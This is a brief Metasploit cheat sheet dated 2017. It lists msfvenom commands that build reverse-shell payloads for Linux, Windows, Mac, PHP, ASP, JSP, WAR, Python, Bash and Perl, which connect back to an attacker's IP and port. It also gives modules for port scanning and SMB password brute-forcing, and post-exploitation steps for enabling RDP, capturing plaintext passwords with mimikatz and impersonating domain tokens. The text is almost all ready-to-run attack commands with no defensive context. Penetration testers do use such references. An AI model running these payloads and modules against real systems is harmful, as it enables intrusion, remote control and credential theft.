Metasploit Framework Exploitation Summary
Jul 13, 2017
msfvenom Payload List
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Handlers
use exploit/multi/handler
Port Scanning
use auxiliary/scanner/portscan/tcp
Windows SMB Modules
Scan SMB to identify hosts
use auxiliary/scanner/smb/smb_version
Brute-force SMB passwords
use auxiliary/scanner/smb/smb_login
Enable Remote Desktop (port 3389)
meterpreter > run post/windows/manage/enable_rdp
Disable the firewall
shell
Live screenshot
screenshot
Load mimikatz in meterpreter to capture plaintext passwords
meterpreter > load mimikatz
Steal and impersonate domain account tokens
load incognito